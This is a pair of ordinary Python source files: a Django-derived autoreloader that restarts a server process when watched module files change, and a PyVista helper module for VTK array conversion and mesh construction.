""" Autoreloading Launcher Borrowed/adapted from Django Autoreload Utility (https://github.com/django/django/...autoreload.py) Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org). Some taken from Ian Bicking's Paste (http://pythonpaste.org/). Portions copyright (c) 2004, CherryPy Team (team@cherrypy.org). All rights reserved. Portions copyright (c) 2017, Django Software Foundation and individual contributors. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions, and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the Django or the CherryPy Team, nor the names of its contributors, may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The following changes were made to the borrowed code. 
This is a summary only, and does not detail every minor change: - Converted to an object-oriented structure with instance variables that carry the state of the reloader instead of using `global` to modify module globals that carry the state of the reloader. - Abandoned the use of the non-standard `_thread` module in favor of the `threading` module. - Moved the reloader into a daemonic thread (it was previously in the main thread) so that PyInotify can exit when the main thread exits. Moved the main program execution into the main thread (it was previously in a non-daemonic background thread) so that it can use `signal.signal`. - Eliminated the carrying of "error files," which are no longer necessary since the main program execution now happens in the main thread. - Properly signal the main program thread to shutdown cleanly instead of killing it harshly. - Added input variables for filtering modules to monitor and for indicating the `-m` main module used to execute the program. - Renamed a bunch of variables and functions/methods to reduce ambiguity and have more-self-documenting code. - Added considerable documentation about the operation of the reloader. 
""" from __future__ import ( absolute_import, print_function, unicode_literals, ) import abc import os import re import signal import subprocess import sys import threading import time import six USE_PY_INOTIFY = False try: # Test whether inotify is enabled and likely to work # noinspection PyPackageRequirements import pyinotify fd = pyinotify.INotifyWrapper.create().inotify_init() if fd >= 0: USE_PY_INOTIFY = True os.close(fd) except ImportError: pyinotify = None __all__ = ( 'get_reloader', ) NEED_RELOAD_EXIT_CODE = 3 def _clean_files(file_list): file_names = [] for file_name in file_list: if not file_name: continue if file_name.endswith('.pyc') or file_name.endswith('.pyo'): file_name = file_name[:-1] if file_name.endswith('$py.class'): file_name = file_name[:-9] + 'py' if os.path.exists(file_name): file_names.append(file_name) return file_names @six.add_metaclass(abc.ABCMeta) class AbstractReloader(object): """ This is the abstract base reloader, which handles most of the code associated with watching files for changes and reloading the application when changes are detected. All base classes must implement the logic for actually determining when changes happen to files (encapsulated within the abstract method `code_changed`). This base class does the following: - If this is the parent process, it starts a clone child process with the reloader enabled - If this is the parent process and the clone child process exits with exit code `NEED_RELOAD_EXIT_CODE`, it restarts the clone child process with the reloader enabled. If the child process exits with any other exit code, it exits with the same exit code. - If this is the child process, it starts a daemonic thread for watching files for changes and then executes the main program callable in the main thread. - The child process daemonic watching thread gets a list of files (possibly filtered by the `watch_modules` constructor parameter) that should be watched for changes and then watches them for changes. 
If changes occur, it signals the server process to shut down and then exits with exit code `NEED_RELOAD_EXIT_CODE` when it does. """ def __init__(self, main_module_name, watch_modules, signal_forks=False): """ Constructs a new abstract reloader. All subclasses must call `super(...).__init__(...)`. This sets up some important instance variables: - `main_module_name` from the constructor parameter - `watch_modules` is a compiled regular expression for matching module names based on the array from the constructor parameter, or `None` if `None` is passed in - `signal_forks` from the constructor parameter - `cached_modules` is a set of modules that have already been seen by `get_watch_file_names` - `cached_file_names` is a list of files that have already been seen by `get_cached_file_names` - `watching` is a flag to indicate whether the watcher is currently running; it is also used to tell the watcher to stop running. - `shutting_down_for_reload` is a flag that the watcher thread sets to tell the main thread that the server is shutting down due to file changes, so that the main thread knows to exit with exit code `NEED_RELOAD_EXIT_CODE`. See the documentation for `get_reloader` below for the meaning of the constructor parameters. """ self.main_module_name = main_module_name self.watch_modules = re.compile( r'^{}'.format('|'.join(watch_modules).replace('.', r'\.')) ) if watch_modules else None self.signal_forks = signal_forks self.cached_modules = set() self.cached_file_names = [] self.watching = False self.shutting_down_for_reload = False def get_watch_file_names(self, only_new=False): """ This determines which files we need to watch for changes. For starters, we only watch those modules that have been loaded as of startup. Furthermore, if `watch_modules` has been specified, we only watch loaded modules that match the name or names provided, or whose parents match the name or names provided. 
To be efficient, we cache the models and files initially looked at, and only look again if new modules have been loaded since we last looked. :param only_new: `True` means only return the file names that have not been returned on a previous call :return: A list of files that we need to watch """ self.cached_file_names = _clean_files(self.cached_file_names) module_values = set(sys.modules.values()) if self.cached_modules == module_values: if only_new: return [] else: return self.cached_file_names new_modules = module_values - self.cached_modules self.cached_modules = self.cached_modules.union(new_modules) if self.watch_modules: new_file_names = _clean_files( m.__file__ for m in new_modules if hasattr(m, '__file__') and self.watch_modules.match(m.__name__) ) else: new_file_names = _clean_files(m.__file__ for m in new_modules if hasattr(m, '__file__')) self.cached_file_names += new_file_names if only_new: return new_file_names else: return self.cached_file_names @abc.abstractmethod def code_changed(self): """ All subclasses must implement this. It should either block indefinitely until a file changes and then return `True`, or it should return `True` or `False` immediately to indicate whether files have changed since it was last called. :return: `True` or `False, has one or more files changed to require a reload """ raise NotImplementedError() def watch_files(self): """ Depending on the implementation, this loops or blocks indefinitely until the file watcher indicates code has changed, at which point it causes a process exit with the exit code `NEED_RELOAD_EXIT_CODE`. 
""" self.watching = True while self.watching: if self.code_changed(): # Signal the server process that we want it to stop (including its forks), and tell the reloader why self.shutting_down_for_reload = True os.kill(os.getpid(), signal.SIGTERM) if self.signal_forks: os.kill(os.getpid(), signal.SIGHUP) # The server should only take 5 seconds to shut down; if it takes longer, send it another signal i = 0 while self.watching: time.sleep(0.5) i += 1 if i > 12: print("Process took too long to stop after file change; signaling again (won't restart)") os.kill(os.getpid(), signal.SIGTERM) break break time.sleep(1) def stop_watching(self): """ This allows the main thread to signal the watcher thread that it should stop watching files. Subclasses may override this to perform additional stop-watching operations, but they must call `super(...).stop_watching()`. """ self.watching = False def restart_with_reloader(self): """ This starts a subprocess that is a clone of the current process, with all the same arguments, but with the `RUN_RELOADER_MAIN` environment variable added to the subprocess's environment. It blocks until that subprocess exits, and then examines its exit code. If the exit code is `NEED_RELOAD_EXIT_CODE`, this means the file watcher indicated files have changed and need to be reloaded and exited, so this loops and starts the process again. :return: The code with which the clone subprocess exited if not `NEED_RELOAD_EXIT_CODE`. """ command = [sys.executable] + ['-W{}'.format(o) for o in sys.warnoptions] if self.main_module_name and '{}.py'.format(self.main_module_name.replace('.', '/')) in sys.argv[0]: # The server was started with `python -m some_module`, so sys.argv is "wrong." Fix it. command += ['-m', self.main_module_name] command += sys.argv[1:] else: # The server was started with /path/to/file.py, so sys.argv is "right." 
command += sys.argv new_environment = os.environ.copy() new_environment['RUN_RELOADER_MAIN'] = 'true' while True: # We don't want these signals to actually kill this process; just sub-processes signal.signal(signal.SIGINT, signal.SIG_IGN) signal.signal(signal.SIGTERM, signal.SIG_IGN) exit_code = subprocess.call(command, env=new_environment) if exit_code != NEED_RELOAD_EXIT_CODE: return exit_code def watch_and_reload(self, func, args, kwargs): """ This is what gets the watching process started. In order to monitor for changes and control process restarts, we actually need to start the entire server process from the watcher. But the server process has already started. So, if this is the original server process (environment variable `RUN_RELOADER_MAIN` is not set), we call `restart_with_reloader` to actually start the server process again with files watched. If this is the restarted server process (environment variable `RUN_RELOADER_MAIN` _is_ set), then we start the reloading loop. The original started process does not die. It continues running until `restart_with_reloader` returns, which doesn't happen until the restarted (child) server process exits with a code other than `NEED_RELOAD_EXIT_CODE`. 
:param func: The main program execution function, usually something like ExampleServer.main :param args: The positional arguments that should be passed to the main program execution function :param kwargs: The keyword arguments that should be passed to the main program execution function """ if os.environ.get('RUN_RELOADER_MAIN') == 'true': thread = threading.Thread(target=self.watch_files) thread.daemon = True # we don't want this thread to stop the program from exiting thread.start() try: func(*args, **kwargs) except KeyboardInterrupt: pass except BaseException: self.stop_watching() raise self.stop_watching() if self.shutting_down_for_reload: sys.exit(NEED_RELOAD_EXIT_CODE) # server process shut down because the reloader asked it to else: sys.exit(0) # server process terminated naturally else: try: exit_code = self.restart_with_reloader() if exit_code < 0: # Python docs say: A negative exit code -N indicates that the child was terminated by signal N. os.kill(os.getpid(), -exit_code) else: sys.exit(exit_code) except KeyboardInterrupt: pass def main(self, func, args=None, kwargs=None): """ This is the method that all consumers of the reloader should call. Pass it the main program execution function, along with the args and kwargs that should be passed to the main program execution function, and it will supervise the execution of the main program function and watch for file changes. It will then restart the process if any file changes occur. See the documentation for the other methods to understand how this work in more detail. 
:param func: The main program execution function, usually something like ExampleServer.main :param args: The positional arguments that should be passed to the main program execution function :param kwargs: The keyword arguments that should be passed to the main program execution function """ if args is None: args = () if kwargs is None: kwargs = {} self.watch_and_reload(func, args, kwargs) class _PyInotifyReloader(AbstractReloader): """ This concrete class completes the reloader by using the PyInotify API. It is only supported on Linux operating systems with kernel version >= 2.6.13. """ def __init__(self, main_module_name, watch_modules, signal_forks=False): self.notifier = None super(_PyInotifyReloader, self).__init__(main_module_name, watch_modules, signal_forks) def code_changed(self): notify_mask = ( pyinotify.IN_MODIFY | pyinotify.IN_DELETE | pyinotify.IN_ATTRIB | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO | pyinotify.IN_CREATE | pyinotify.IN_DELETE_SELF | pyinotify.IN_MOVE_SELF ) class EventHandler(pyinotify.ProcessEvent): def process_default(self, event): pass watch_manager = pyinotify.WatchManager() self.notifier = pyinotify.Notifier(watch_manager, EventHandler()) file_names = self.get_watch_file_names(only_new=True) for file_name in file_names: watch_manager.add_watch(file_name, notify_mask) self.notifier.check_events(timeout=None) if self.watching: self.notifier.read_events() self.notifier.process_events() self.notifier.stop() self.notifier = None # If we are here, then one or more files must have changed return True return False def stop_watching(self): if self.watching: # The first time this is called, stop the notifier super(_PyInotifyReloader, self).stop_watching() if self.notifier: self.notifier.stop() self.notifier = None else: super(_PyInotifyReloader, self).stop_watching() class _PollingReloader(AbstractReloader): """ This concrete class completes the reloader by polling the last-modified time stat for every file being watched. 
It is not as fast as the PyInotify reloader in large applications, but it is supported on all operating systems. """ is_windows = sys.platform == 'win32' def __init__(self, main_module_name, watch_modules, signal_forks=False): self.modified_times = {} super(_PollingReloader, self).__init__(main_module_name, watch_modules, signal_forks) def code_changed(self): file_names = self.get_watch_file_names() for file_name in file_names: stat = os.stat(file_name) modified_time = stat.st_mtime if self.is_windows: modified_time -= stat.st_ctime if file_name not in self.modified_times: self.modified_times[file_name] = modified_time continue if modified_time != self.modified_times[file_name]: self.modified_times = {} return True return False def get_reloader(main_module_name, watch_modules, signal_forks=False): """ Don't instantiate a reloader directly. Instead, call this method to get a reloader, and then call `main` on that reloader. See the documentation for `AbstractReloader.main` above to see how to call it. :param main_module_name: The main module name (such as "example_service.standalone"). It should be the value that was passed to the `-m` parameter when starting the Python executable, or `None` if the `-m` parameter was not used. :param watch_modules: If passed an iterable/generator of module names, file watching will be limited to modules whose names start with one of these names (including their submodules). For example, if passed `['example', 'pysoa']`, it will monitor all of PySOA's modules and submodules and all of `example_service`'s modules and submodules, as well as any other modules that start with `example`. If `None`, all files from all modules in all libraries, including Python, will be watched. :param signal_forks: If `True`, this means the server process is actually multiprocessing/forking and its child processes are the actual server processes. 
In this case, the file watcher also sends `SIGHUP` in addition to `SIGTERM` to the clone process, and the clone process receives this and knows to send `SIGTERM` to all of its forked child processes. :return: a new reloader instance. """ if USE_PY_INOTIFY: return _PyInotifyReloader(main_module_name, watch_modules, signal_forks) return _PollingReloader(main_module_name, watch_modules, signal_forks)
helpers.py
"""Supporting functions for polydata and grid objects.""" import signal import collections import ctypes import enum import logging import warnings from threading import Thread import numpy as np import scooby import vtk import vtk.util.numpy_support as nps import pyvista from .fileio import from_meshio class FieldAssociation(enum.Enum): """Represents which type of vtk field a scalar or vector array is associated with.""" POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS def get_vtk_type(typ): """Look up the VTK type for a give python data type. Corrects for string type mapping issues. Return ------ int : the integer type id specified in vtkType.h """ typ = nps.get_vtk_array_type(typ) # This handles a silly string type bug if typ == 3: return 13 return typ def vtk_bit_array_to_char(vtkarr_bint): """Cast vtk bit array to a char array.""" vtkarr = vtk.vtkCharArray() vtkarr.DeepCopy(vtkarr_bint) return vtkarr def vtk_id_list_to_array(vtk_id_list): """Convert a vtkIdList to a NumPy array.""" return np.array([vtk_id_list.GetId(i) for i in range(vtk_id_list.GetNumberOfIds())]) def convert_string_array(arr, name=None): """Convert a numpy array of strings to a vtkStringArray or vice versa. Note that this is terribly inefficient - inefficient support is better than no support :). If you have ideas on how to make this faster, please consider opening a pull request. 
""" if isinstance(arr, np.ndarray): vtkarr = vtk.vtkStringArray() ########### OPTIMIZE ########### for val in arr: vtkarr.InsertNextValue(val) ################################ if isinstance(name, str): vtkarr.SetName(name) return vtkarr # Otherwise it is a vtk array and needs to be converted back to numpy carr = np.empty(arr.GetNumberOfValues(), dtype='O') ############### OPTIMIZE ############### for i in range(arr.GetNumberOfValues()): carr[i] = arr.GetValue(i) ######################################## return carr.astype('|S') def convert_array(arr, name=None, deep=0, array_type=None): """Convert a NumPy array to a vtkDataArray or vice versa. Parameters ----------- arr : ndarray or vtkDataArry A numpy array or vtkDataArry to convert name : str The name of the data array for VTK deep : bool if input is numpy array then deep copy values Return ------ vtkDataArray, ndarray, or DataFrame: the converted array (if input is a NumPy ndaray then returns ``vtkDataArray`` or is input is ``vtkDataArray`` then returns NumPy ``ndarray``). If pdf==True and the input is ``vtkDataArry``, return a pandas DataFrame. 
""" if arr is None: return if isinstance(arr, np.ndarray): if arr.dtype is np.dtype('O'): arr = arr.astype('|S') arr = np.ascontiguousarray(arr) try: # This will handle numerical data arr = np.ascontiguousarray(arr) vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type) except ValueError: # This handles strings typ = get_vtk_type(arr.dtype) if typ == 13: vtk_data = convert_string_array(arr) if isinstance(name, str): vtk_data.SetName(name) return vtk_data # Otherwise input must be a vtkDataArray if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)): raise TypeError('Invalid input array type ({}).'.format(type(arr))) # Handle booleans if isinstance(arr, vtk.vtkBitArray): arr = vtk_bit_array_to_char(arr) # Handle string arrays if isinstance(arr, vtk.vtkStringArray): return convert_string_array(arr) # Convert from vtkDataArry to NumPy return nps.vtk_to_numpy(arr) def is_pyvista_dataset(obj): """Return True if the Object is a PyVista wrapped dataset.""" return isinstance(obj, (pyvista.Common, pyvista.MultiBlock)) def point_array(mesh, name): """Return point array of a vtk object.""" vtkarr = mesh.GetPointData().GetAbstractArray(name) return convert_array(vtkarr) def point_scalar(mesh, name): """Return point array of a vtk object. DEPRECATED: please use `point_array` instead. """ warnings.warn("DEPRECATED: please use `point_array` instead.") return point_array(mesh, name) def field_array(mesh, name): """Return field array of a vtk object.""" vtkarr = mesh.GetFieldData().GetAbstractArray(name) return convert_array(vtkarr) def field_scalar(mesh, name): """Return field array of a vtk object. DEPRECATED: please use `field_array` instead. 
""" warnings.warn("DEPRECATED: please use `field_array` instead.") return field_array(mesh, name) def cell_array(mesh, name): """Return cell array of a vtk object.""" vtkarr = mesh.GetCellData().GetAbstractArray(name) return convert_array(vtkarr) def cell_scalar(mesh, name): """Return cell array of a vtk object. DEPRECATED: please use `cell_array` instead. """ warnings.warn("DEPRECATED: please use `cell_array` instead.") return cell_array(mesh, name) def row_array(data_object, name): """Return row array of a vtk object.""" vtkarr = data_object.GetRowData().GetAbstractArray(name) return convert_array(vtkarr) def parse_field_choice(field): """Return the id of the given field.""" if isinstance(field, str): field = field.strip().lower() if field in ['cell', 'c', 'cells']: field = FieldAssociation.CELL elif field in ['point', 'p', 'points']: field = FieldAssociation.POINT elif field in ['field', 'f', 'fields']: field = FieldAssociation.NONE elif field in ['row', 'r',]: field = FieldAssociation.ROW else: raise RuntimeError('Data field ({}) not supported.'.format(field)) elif isinstance(field, FieldAssociation): pass else: raise RuntimeError('Data field ({}) not supported.'.format(field)) return field def get_array(mesh, name, preference='cell', info=False, err=False): """Search point, cell and field data for an array. Parameters ---------- name : str The name of the array to get the range. preference : str, optional When scalars is specified, this is the preferred array type to search for in the dataset. Must be either ``'point'``, ``'cell'``, or ``'field'`` info : bool Return info about the array rather than the array itself. err : bool Boolean to control whether to throw an error if array is not present. 
""" if isinstance(mesh, vtk.vtkTable): arr = row_array(mesh, name) if arr is None and err: raise KeyError('Data array ({}) not present in this dataset.'.format(name)) field = FieldAssociation.ROW if info: return arr, field return arr parr = point_array(mesh, name) carr = cell_array(mesh, name) farr = field_array(mesh, name) preference = parse_field_choice(preference) if np.sum([parr is not None, carr is not None, farr is not None]) > 1: if preference == FieldAssociation.CELL: if info: return carr, FieldAssociation.CELL else: return carr elif preference == FieldAssociation.POINT: if info: return parr, FieldAssociation.POINT else: return parr elif preference == FieldAssociation.NONE: if info: return farr, FieldAssociation.NONE else: return farr else: raise RuntimeError('Data field ({}) not supported.'.format(preference)) arr = None field = None if parr is not None: arr = parr field = FieldAssociation.POINT elif carr is not None: arr = carr field = FieldAssociation.CELL elif farr is not None: arr = farr field = FieldAssociation.NONE elif err: raise KeyError('Data array ({}) not present in this dataset.'.format(name)) if info: return arr, field return arr def vtk_points(points, deep=True): """Convert numpy points to a vtkPoints object.""" if not points.flags['C_CONTIGUOUS']: points = np.ascontiguousarray(points) vtkpts = vtk.vtkPoints() vtkpts.SetData(nps.numpy_to_vtk(points, deep=deep)) return vtkpts def line_segments_from_points(points): """Generate non-connected line segments from points. Assumes points are ordered as line segments and an even number of points are Parameters ---------- points : np.ndarray Points representing line segments. An even number must be given as every two vertices represent a single line segment. For example, two line segments would be represented as: np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]]) Returns ------- lines : pyvista.PolyData PolyData with lines and cells. 
Examples -------- This example plots two line segments at right angles to each other line. >>> import pyvista >>> import numpy as np >>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]]) >>> lines = pyvista.lines_from_points(points) >>> lines.plot() # doctest:+SKIP """ if len(points) % 2: raise RuntimeError("An even number of points must be given to define each segment.") # Assuming ordered points, create array defining line order n_points = len(points) n_lines = n_points // 2 lines = np.c_[(2 * np.ones(n_lines, np.int), np.arange(0, n_points-1, step=2), np.arange(1, n_points+1, step=2))] poly = pyvista.PolyData() poly.points = points poly.lines = lines return poly def lines_from_points(points, close=False): """Make a connected line set given an array of points. Parameters ---------- points : np.ndarray Points representing the vertices of the connected segments. For example, two line segments would be represented as: np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0]]) close : bool, optional If True, close the line segments into a loop Return ------ lines : pyvista.PolyData PolyData with lines and cells. 
""" poly = pyvista.PolyData() poly.points = points cells = np.full((len(points)-1, 3), 2, dtype=np.int) cells[:, 1] = np.arange(0, len(points)-1, dtype=np.int) cells[:, 2] = np.arange(1, len(points), dtype=np.int) if close: cells = np.append(cells, [[2, len(points)-1, 0],], axis=0) poly.lines = cells return poly def vector_poly_data(orig, vec): """Create a vtkPolyData object composed of vectors.""" # shape, dimension checking if not isinstance(orig, np.ndarray): orig = np.asarray(orig) if not isinstance(vec, np.ndarray): vec = np.asarray(vec) if orig.ndim != 2: orig = orig.reshape((-1, 3)) elif orig.shape[1] != 3: raise Exception('orig array must be 3D') if vec.ndim != 2: vec = vec.reshape((-1, 3)) elif vec.shape[1] != 3: raise Exception('vec array must be 3D') # Create vtk points and cells objects vpts = vtk.vtkPoints() vpts.SetData(nps.numpy_to_vtk(np.ascontiguousarray(orig), deep=True)) npts = orig.shape[0] cells = np.hstack((np.ones((npts, 1), 'int'), np.arange(npts).reshape((-1, 1)))) if cells.dtype != ctypes.c_int64 or cells.flags.c_contiguous: cells = np.ascontiguousarray(cells, ctypes.c_int64) cells = np.reshape(cells, (2*npts)) vcells = vtk.vtkCellArray() vcells.SetCells(npts, nps.numpy_to_vtkIdTypeArray(cells, deep=True)) # Create vtkPolyData object pdata = vtk.vtkPolyData() pdata.SetPoints(vpts) pdata.SetVerts(vcells) # Add vectors to polydata name = 'vectors' vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(vec), deep=True) vtkfloat.SetName(name) pdata.GetPointData().AddArray(vtkfloat) pdata.GetPointData().SetActiveVectors(name) # Add magnitude of vectors to polydata name = 'mag' scalars = (vec * vec).sum(1)**0.5 vtkfloat = nps.numpy_to_vtk(np.ascontiguousarray(scalars), deep=True) vtkfloat.SetName(name) pdata.GetPointData().AddArray(vtkfloat) pdata.GetPointData().SetActiveScalars(name) return pyvista.PolyData(pdata) def trans_from_matrix(matrix): """Convert a vtk matrix to a numpy.ndarray.""" t = np.zeros((4, 4)) for i in range(4): for j in range(4): 
t[i, j] = matrix.GetElement(i, j) return t def is_meshio_mesh(mesh): """Test if passed object is instance of ``meshio.Mesh``.""" try: import meshio return isinstance(mesh, meshio.Mesh) except ImportError: return False def wrap(vtkdataset): """Wrap any given VTK data object to its appropriate PyVista data object. Other formats that are supported include: * 2D :class:`numpy.ndarray` of XYZ vertices * 3D :class:`numpy.ndarray` representing a volume. Values will be scalars. """ wrappers = { 'vtkUnstructuredGrid': pyvista.UnstructuredGrid, 'vtkRectilinearGrid': pyvista.RectilinearGrid, 'vtkStructuredGrid': pyvista.StructuredGrid, 'vtkPolyData': pyvista.PolyData, 'vtkImageData': pyvista.UniformGrid, 'vtkStructuredPoints': pyvista.UniformGrid, 'vtkMultiBlockDataSet': pyvista.MultiBlock, 'vtkTable': pyvista.Table, # 'vtkParametricSpline': pyvista.Spline, } # Otherwise, we assume a VTK data object was passed if hasattr(vtkdataset, 'GetClassName'): key = vtkdataset.GetClassName() elif vtkdataset is None: return None elif isinstance(vtkdataset, np.ndarray): if vtkdataset.ndim == 1 and vtkdataset.shape[0] == 3: return pyvista.PolyData(vtkdataset) if vtkdataset.ndim > 1 and vtkdataset.ndim < 3 and vtkdataset.shape[1] == 3: return pyvista.PolyData(vtkdataset) elif vtkdataset.ndim == 3: mesh = pyvista.UniformGrid(vtkdataset.shape) mesh['values'] = vtkdataset.ravel(order='F') mesh.active_scalars_name = 'values' return mesh else: print(vtkdataset.shape, vtkdataset) raise NotImplementedError('NumPy array could not be converted to PyVista.') elif is_meshio_mesh(vtkdataset): return from_meshio(vtkdataset) else: raise NotImplementedError('Type ({}) not able to be wrapped into a PyVista mesh.'.format(type(vtkdataset))) try: wrapped = wrappers[key](vtkdataset) except KeyError: logging.warning('VTK data type ({}) is not currently supported by pyvista.'.format(key)) return vtkdataset # if not supported just passes the VTK data object return wrapped def image_to_texture(image): """Convert 
``vtkImageData`` (:class:`pyvista.UniformGrid`) to a ``vtkTexture``.""" return pyvista.Texture(image) def numpy_to_texture(image): """Convert a NumPy image array to a vtk.vtkTexture.""" if not isinstance(image, np.ndarray): raise TypeError('Unknown input type ({})'.format(type(image))) return pyvista.Texture(image) def is_inside_bounds(point, bounds): """Check if a point is inside a set of bounds. This is implemented through recursion so that this is N-dimensional. """ if isinstance(point, (int, float)): point = [point] if isinstance(point, collections.Iterable) and not isinstance(point, collections.deque): if len(bounds) < 2 * len(point) or len(bounds) % 2 != 0: raise AssertionError('Bounds mismatch point dimensionality') point = collections.deque(point) bounds = collections.deque(bounds) return is_inside_bounds(point, bounds) if not isinstance(point, collections.deque): raise TypeError('Unknown input data type ({}).'.format(type(point))) if len(point) < 1: return True p = point.popleft() lower, upper = bounds.popleft(), bounds.popleft() if lower <= p <= upper: return is_inside_bounds(point, bounds) return False def fit_plane_to_points(points, return_meta=False): """Fit a plane to a set of points. 
Parameters ---------- points : np.ndarray Size n by 3 array of points to fit a plane through return_meta : bool If true, also returns the center and normal used to generate the plane """ data = np.array(points) center = data.mean(axis=0) result = np.linalg.svd(data - center) normal = np.cross(result[2][0], result[2][1]) plane = pyvista.Plane(center=center, direction=normal) if return_meta: return plane, center, normal return plane def raise_not_matching(scalars, mesh): """Raise exception about inconsistencies.""" if isinstance(mesh, vtk.vtkTable): raise Exception('Number of scalars ({})'.format(scalars.size) + 'must match number of rows ' + '({}).'.format(mesh.n_rows) ) raise Exception('Number of scalars ({}) '.format(scalars.size) + 'must match either the number of points ' + '({}) '.format(mesh.n_points) + 'or the number of cells ' + '({}). '.format(mesh.n_cells) ) def generate_plane(normal, origin): """Return a vtk.vtkPlane.""" plane = vtk.vtkPlane() # NORMAL MUST HAVE MAGNITUDE OF 1 normal = normal / np.linalg.norm(normal) plane.SetNormal(normal) plane.SetOrigin(origin) return plane def generate_report(additional=None, ncol=3, text_width=54, sort=False): """Generate a report. DEPRECATED: Please use :class:`pyvista.Report` instead. """ logging.warning('DEPRECATED: Please use `pyvista.Report` instead.') core = ['pyvista', 'vtk', 'numpy', 'imageio', 'appdirs', 'scooby'] optional = ['matplotlib', 'PyQt5', 'IPython', 'colorcet', 'cmocean'] report = scooby.Report(core=core, optional=optional, additional=additional, ncol=ncol, text_width=text_width, sort=sort) return report def try_callback(func, *args): """Wrap a given callback in a try statement.""" try: func(*args) except Exception as e: logging.warning('Encountered issue in callback: {}'.format(e)) return def check_depth_peeling(number_of_peels=100, occlusion_ratio=0.0): """Check if depth peeling is available. Attempts to use depth peeling to see if it is available for the current environment. 
Returns ``True`` if depth peeling is available and has been successfully leveraged, otherwise ``False``. """ # Try Depth Peeling with a basic scene source = vtk.vtkSphereSource() mapper = vtk.vtkPolyDataMapper() mapper.SetInputConnection(source.GetOutputPort()) actor = vtk.vtkActor() actor.SetMapper(mapper) # requires opacity < 1 actor.GetProperty().SetOpacity(0.5) renderer = vtk.vtkRenderer() renderWindow = vtk.vtkRenderWindow() renderWindow.AddRenderer(renderer) renderWindow.SetOffScreenRendering(True) renderWindow.SetAlphaBitPlanes(True) renderWindow.SetMultiSamples(0) renderer.AddActor(actor) renderer.SetUseDepthPeeling(True) renderer.SetMaximumNumberOfPeels(number_of_peels) renderer.SetOcclusionRatio(occlusion_ratio) renderWindow.Render() return renderer.GetLastRenderingUsedDepthPeeling() == 1 def threaded(fn): """Call a function using a thread.""" def wrapper(*args, **kwargs): thread = Thread(target=fn, args=args, kwargs=kwargs) thread.start() return thread return wrapper class conditional_decorator(object): """Conditional decorator for methods.""" def __init__(self, dec, condition): """Initialize.""" self.decorator = dec self.condition = condition def __call__(self, func): """Call the decorated function if condition is matched.""" if not self.condition: # Return the function unchanged, not decorated. return func return self.decorator(func) class ProgressMonitor(): """A standard class for monitoring the progress of a VTK algorithm. This must be use in a ``with`` context and it will block keyboard interrupts from happening until the exit event as interrupts will crash the kernel if the VTK algorithm is still executing. 
""" def __init__(self, algorithm, message="", scaling=100): """Initialize observer.""" try: from tqdm import tqdm except ImportError: raise ImportError("Please install `tqdm` to monitor algorithms.") self.event_type = vtk.vtkCommand.ProgressEvent self.progress = 0.0 self._last_progress = self.progress self.algorithm = algorithm self.message = message self._interrupt_signal_received = False self._old_progress = 0 self._old_handler = None self._progress_bar = None def handler(self, sig, frame): """Pass signal to custom interrupt handler.""" self._interrupt_signal_received = (sig, frame) logging.debug('SIGINT received. Delaying KeyboardInterrupt until ' 'VTK algorithm finishes.') def __call__(self, obj, event, *args): """Call progress update callback. On an event occurrence, this function executes. """ if self._interrupt_signal_received: obj.AbortExecuteOn() else: progress = obj.GetProgress() step = progress - self._old_progress self._progress_bar.update(step) self._old_progress = progress def __enter__(self): """Enter event for ``with`` context.""" from tqdm import tqdm self._old_handler = signal.signal(signal.SIGINT, self.handler) self._progress_bar = tqdm(total=1, leave=True, bar_format='{l_bar}{bar}[{elapsed}<{remaining}]') self._progress_bar.set_description(self.message) self.algorithm.AddObserver(self.event_type, self) return self._progress_bar def __exit__(self, type, value, traceback): """Exit event for ``with`` context.""" self._progress_bar.total = 1 self._progress_bar.refresh() self._progress_bar.close() self.algorithm.RemoveObservers(self.event_type) signal.signal(signal.SIGINT, self._old_handler)
run_py_tests.py
